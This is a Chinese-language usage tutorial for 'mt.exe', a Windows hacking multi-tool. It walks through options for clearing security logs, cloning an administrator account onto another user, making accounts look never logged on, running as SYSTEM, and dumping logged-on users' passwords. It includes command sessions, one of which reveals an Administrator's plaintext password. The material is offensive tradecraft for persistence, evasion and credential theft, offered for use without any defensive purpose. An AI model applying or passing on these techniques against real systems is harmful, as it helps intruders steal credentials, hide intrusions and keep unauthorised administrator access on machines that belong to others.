MT的使用

用法: mt.exe <选项>  
选项 :  
-filter ---更改 TCP/IP 过滤器的开头状态  
-addport ---添加端口到过滤器的允许列表  
-setport ---设置端口作为过滤器的允许列表  
-nicinfo ---列出 TCP/IP 界面信息  
-pslist ---列出活动进程  
-pskill ---杀毒指定进程  
-dlllist ---列出指定进程的 DLL  
-sysinfo ---列出系统信息  
-shutdown ---关闭系统  
-reboot ---重启系统  
-poweroff ---关闭电源  
-logoff ---注销当前用户会话  
-chkts ---检查终端服务信息  
-setupts ---安装终端服务  
-remts ---卸载终端服务  
-chgtsp ---重置终端服务端口  
-clog ---清除系统日志  
-enumsrv ---列出所有服务  
-querysrv ---列出指定服务的详细信息  
-instsrv ---安装一个服务  
-cfgsrv ---更改服务配置  
-remsrv ---卸载指定服务  
-startsrv ---启动指定服务  
-stopsrv ---停止指定服务  
-netget ---从 http/ftp 下载  
-redirect ---端口重定向  
-chkuser ---列出所有账户、sid 和 anti 克隆  
-clone ---克隆 admin 到目标  
-never ---设置账户看上去从未登录  
-killuser ---删除账户，甚至是 "guest" 也可删除  
-su ---以 Local_System 权限运行进程  
-findpass ---显示所有已登录用户的口令  
-netstat ---列出 TCP 连接  
-killtcp ---杀死 TCP 连接  
-psport ---映射端口到进程  
-touch ---设置文件日期和时间到指定值  
-secdel ---安全擦除文件或目录占用的空间  
-regshell ---进入一个控制台注册表编辑器  
-chkdll ---检测 gina dll 后门 

一MT.EXE –filter  
Usage:  
MT -filter <ON|OFF> ----Enabld|Disable TCP/IP Filter.  
这个是打开关闭TCP/IP筛选的

二MT.EXE-pslist 
列出系统活动进程

三MT.EXE -pskill  
Usage:  
mt -pskill <PID|ProcessName>  杀进程
我们使用MyIE.exe这个软件作为测试,看看他们能不能杀死这个进程,输入MT –PSLIST,我们知道MyIE.exe的PID值是924,于是输入:mt.exe -pskill 924 

四mt.exe -dlllist  
Usage:  
mt -dlllist <PID|ProcessName>  
列出进程中相关的DLL文件

五 mt.exe –sysinfo  
列出系统信息

六mt.exe -shutdown ---Shutdown system.  
-reboot ---Reboot system.  
-poweroff ---Turn off power.  
-logoff ---Logoff current user’s session.  
这4个命令就不说了,和系统工具shutdown不一样的是,输入之后没有任何的提示,直接关机

七 mt.exe -chkts ---Check Terminal Service info.  
-setupts ---Install Terminal Service.    安装终端服务
-remts ---Remove Terminal Service.       卸载终端服务
-chgtsp ---Reset Terminal Service port.  重新设置终端端口号
这4个命令是和Terminal相关的

八mt.exe -clog用来清除记录,我们输入:  
Usage:  
mt -clog <app|sec|sys|all> ---Clean Application|Security|System|All logs.  
从上面的可以看出,我们可以清除 "应用程序" "安全性" "系统"3个日志

九mt.exe-enumsrv   
列出所有的服务

十mt.exe -clone  

Usage:  
mt -clone <SourUser> <DestUser>  
克隆账号
新建一个用户yun,现在我要将管理员账号lin克隆为账号yun,输入:  
D:/hack>mt -clone lin yun  

Fail to Open SAM Key, 操作成功完成。  
mt.exe -clone lin yun  

Fail to Open SAM Key, 操作成功完成。  
可能是不支持XP系统,虽然提示说操作成功,可是事实上,使用yun登陆的时候,还是没有成功,可能也是有其缺陷或者是我自己操作失败吧. 

十一D:/>mt -never  
-never ---Set account looks like never logged on.  
它可以设置使用户看起来从来没有登陆过,在我的系统里面有2个用户,一个是管理员lin,另外一个是公用的帐户316,现在我把316设置为从不登陆的状态.输入  
D:/>mt -never 316  

Require System Privilege.提示没有权限,于是  

D:/>mt -su  

打开新的CMD窗口,输入  
Microsoft Windows XP [版本 5.1.2600]  
(C) 版权所有 1985-2001 Microsoft Corp.  

C:/WINDOWS/system32>d:  

D:/>mt -never 316  

Fail to Set F Value.  

D:/>net user 316  
用户名 316  
全名 316  
注释  
用户的注释  
国家(地区)代码 000 (系统默认值)  
帐户启用 Yes  
帐户到期 从不  

上次设置密码 2004/5/19 下午 08:22  
密码到期 从不  
密码可更改 2004/5/19 下午 08:22  
需要密码 Yes  
用户可以更改密码 Yes  

允许的工作站 All  
登录脚本  
用户配置文件  
主目录  
上次登录 从不  

可允许的登录小时数 All  

本地组成员 *Users  
全局组成员 *None  
命令成功完成。  

D:/>  
可以看出来已经修改成功了,虽然显示的是Fail to Set F Value.,但还是成功了.这个功能和never.exe是一样的，只是将特定的的帐户上回登陆时间改为帐户从来没有登陆上过系统.  
成功条件:你要有local system权限 

十二 -su ---Run process as Local_System privilege.  
以系统特权运行进程,在管理员登陆的情况下输入MT –su,马上弹出另外一CMD窗口,在这个窗口中,可以做任何我们想做的事情,这个也是系统的最高权限了.  
20 -regshell ---Enter a console registry editor.  
以CMD的方式编辑注册表,输入在CMD下不是很方便,不过有时候也是很使用的,输入:  
D:/>mt -regshell  

HKLM/>dir  

<SubKey> HARDWARE  
<SubKey> SAM  
<SubKey> SECURITY  
<SubKey> SOFTWARE  
<SubKey> SYSTEM  

Total: 5 SubKey, 0 Value.  

HKLM/>quitreg  

D:/>  
和真实环境没有什么区别. 

十三 mt.exe -psport ---Map ports to processes.  
显示进程的端口

十四 mt.exe -findpass ---Show all logged on user’s pass.  
得到所有登陆用户的密码,由于这个命令是For NT/2K only.,所以我在客户机上面测试这个功能,输入,很容易就得到了密码:  
G:/WINNT/system32>mt -findpass  
mt -findpass  

The logon information :  
Domain : 316-2AS8L1B1FL5  
Username : Administrator  
Password : winyaj  

G:/WINNT/system32>  
这个比findpass.exe还方便一些,不需要知道用户进程的PID值.